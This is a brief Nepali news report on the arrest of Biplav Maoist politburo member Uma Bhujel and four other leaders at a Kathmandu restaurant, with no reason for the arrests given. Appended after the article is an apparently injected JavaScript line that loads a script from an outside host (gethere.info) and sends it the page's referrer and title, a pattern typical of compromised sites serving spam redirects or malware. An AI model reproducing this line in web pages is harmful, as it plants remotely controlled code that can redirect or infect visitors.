काठमाडौं, असोज १८ – विप्लव माओवादीकी पोलिटव्युरो सदस्य उमा भुजेलसहित पाँच नेतालाई मंगलबार प्रहरीले पक्राउ गरेको छ ।
राजधानीको बालाजुस्थित हंग्री आई रेस्टुरेन्टमा खाजा खाने क्रममा उमा भुजेल, काठमाडौं जिल्ला संगठन विभाग प्रमुख राजमान तामाङ्, विद्यार्थी नेता नविक केसी सहित ५ जनालाई पक्राउ गरेको हो । उनीहरुलाई किन पक्राउ गरिएको हो भन्ने खुलाइएको छैन ।14555918_10208844061072661_677744627_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;